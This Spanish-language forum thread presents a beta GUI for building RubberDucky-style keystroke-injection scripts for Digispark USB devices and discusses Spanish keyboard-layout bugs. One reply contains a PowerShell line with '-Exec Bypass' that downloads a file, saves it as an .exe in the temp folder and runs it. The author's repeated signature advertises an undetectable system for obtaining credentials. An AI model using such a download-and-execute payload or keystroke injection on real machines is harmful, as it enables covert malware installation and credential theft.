DigiScript SUITE Beta - Editor de scripts para DIGISPARK

Iniciado por JoxM, Agosto 12, 2017, 07:44:10 AM

Tema anterior - Siguiente tema

0 Miembros y 1 Visitante están viendo este tema.

Agosto 12, 2017, 07:44:10 AM Ultima modificación: Agosto 13, 2017, 07:41:04 AM por JoxM

Buenas amigos.

Como dije hace tiempo en otro post que se hablaba de DIGISPARK, quería crear algún tipo de sistema para que usar nuestros digispark sea sencillo.

He creado una pequeña suite, donde podremos crear nuestros scripts bajo la sintaxis de RubberDucky de Hak5.

Internamente usa el No tienes permitido ver los links. Registrarse o Entrar a mi cuenta como sistema para crear el script final.

Tenéis que elegir un directorio que servirá como biblioteca dónde se guardarán los scripts credos desde el software.

Es una versión beta, puede contener algún que otro fallo y la verdad me gustaría que fueran reportados para ir puliendo el software.

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Descarga MEGA desde aquí: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

VIRUSTOTAL SCAN: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Espero que sirva de utilidad para los que trasteamos con Digispark.

Opiniones y sugerencias son bienvenidas!

Saludos a tod@s!
Sistema indetectable para obtener credenciales. Contacta conmigo y te hago una demo.

HOLA!!!

Interesante, pero permite la utilizacion de disposicion de teclado español?

GRACIAS POR LEER!!!
"Algunos creen que soy un bot, puede que tengan razon"
"Como no se puede igualar a Dios, ya he decidido que hacer, ¡SUPERARLO!"
"La peor de las ignorancias es no saber corregirlas"

*Shadow Scouts Team*                                                No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
HOLA!!!

Interesante, pero permite la utilizacion de disposicion de teclado español?

GRACIAS POR LEER!!!

supongo que en la parte inferior donde Dice KB lang debe referirse al lenguaje del keyboard

Buenas!

Correcto lo que dice noxonsoftwares, en la parte inferior está la selección del layout del teclado.

Saludos!
Sistema indetectable para obtener credenciales. Contacta conmigo y te hago una demo.

HOLA!!!

Lamento ser el que trae malas noticias...

El teclado español no esta correctamente porteado.

Muestro ejemplo:
Puse este codigo :
Código: php
STRING  -Exec Bypass "IEX (New-Object System.Net.WebClient).DownloadFile('http://example.com/bob.txt',\"$env:temp\bob.exe\"); Start-Process \"$env:temp\bob.exe\""


Y escribio esto:
Código: php
 -Exec Bypass "IEX (New-Object System.Net.WebClient).DownloadFile('http://example.com/bob.txt',º"$env:tempºbob.exeº"); Start-Process º"$env:tempºbob.exeº""


Como se puede apreciar no funcionan correctamente las barras invertidas y otras funciones del teclado español que ni yo pude hacer funcionar.

Tenia esperanza :(

Saludos.
GRACIAS POR LEER!!!
"Algunos creen que soy un bot, puede que tengan razon"
"Como no se puede igualar a Dios, ya he decidido que hacer, ¡SUPERARLO!"
"La peor de las ignorancias es no saber corregirlas"

*Shadow Scouts Team*                                                No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Buenas!

Gracias por molestarte en probarlo.

Como dije en el primer post, esto es una simple GUI para duck2spark, por lo que ese problema viene desde el compilador del mismo.

De todas formas, he estado investigando y he podido escribir el backslash \ con Digispark sin problemas haciendo esto:

  DigiKeyboard.sendKeyPress(0x61,MOD_ALT_LEFT);
  DigiKeyboard.sendKeyPress(0x5A,MOD_ALT_LEFT);
  DigiKeyboard.sendKeyPress(0);

Intentaré integrarlo en la aplicación.

Un saludo!
Sistema indetectable para obtener credenciales. Contacta conmigo y te hago una demo.

Hola, pudiste integrarlo a tu aplicación, la solución a \. Saludos